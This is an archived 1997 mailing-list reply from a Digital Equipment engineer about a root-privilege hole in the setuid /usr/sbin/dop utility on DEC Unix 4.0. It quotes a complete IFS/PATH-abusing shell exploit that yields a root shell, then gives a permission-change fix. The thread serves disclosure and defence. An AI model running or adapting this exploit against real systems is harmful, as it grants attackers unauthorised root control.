> Anyone can now grab root through a shell, anyone know what dop is used
> for?
> We tried this and it works!!!! Anyone have a patch???
>
> In Norwegian dop is another word for drug, such as in drug abuse (dop
> missbruk). In DEC Unix 4.0, 4.0A and 4.0B you will find /usr/sbin/dop
> setuid root.
>
> -------------------------cut here------------------------------------
> #!/bin/sh
> cat > /tmp/usr <<EOF
> #!/bin/sh
> IFS=" "
> export IFS
> exec /bin/sh
> EOF
> chmod 755 /tmp/usr
> IFS=/ PATH=/tmp:$PATH /usr/sbin/dop crack-user=root
> -------------------------cut here------------------------------------
>
> run this script and get a free root shell.
On our production systems, the /usr/sbin/dop utility is protected thus:
ls -l /usr/sbin/dop
-r-x------ 1 root bin 40960 Nov 16 06:34 /usr/sbin/dop
I would strongly recommend you make the same fix on your systems. With
this change, an attempt by anyone other than root to execute dop yields:
/usr/sbin/dop: cannot execute
The /usr/sbin/dop utility appears to be used by the new system management
GUI components that were introduced in V4.0.
Tom
Dr. Thomas P. Blinn, UNIX Software Group, Digital Equipment Corporation
110 Spit Brook Road, MS ZKO3-2/U20 Nashua, New Hampshire 03062-2698
Technology Partnership Engineering Phone: (603) 881-0646
Internet: tpb_at_zk3.dec.com Digital's Easynet: alpha::tpb
ACM Member: tpblinn_at_acm.org PC_at_Home: tom_at_felines.mv.net
Worry kills more people than work because more people worry than work.
Keep your stick on the ice. -- Rick Green ("Red Green")
My favorite palindrome is: Satan, oscillate my metallic sonatas.
-- Phil Agre, pagre_at_ucsd.edu
Opinions expressed herein are my own, and do not necessarily represent
those of my employer or anyone else, living or dead, real or imagined.
Received on Tue Mar 04 1997 - 23:09:15 NZDT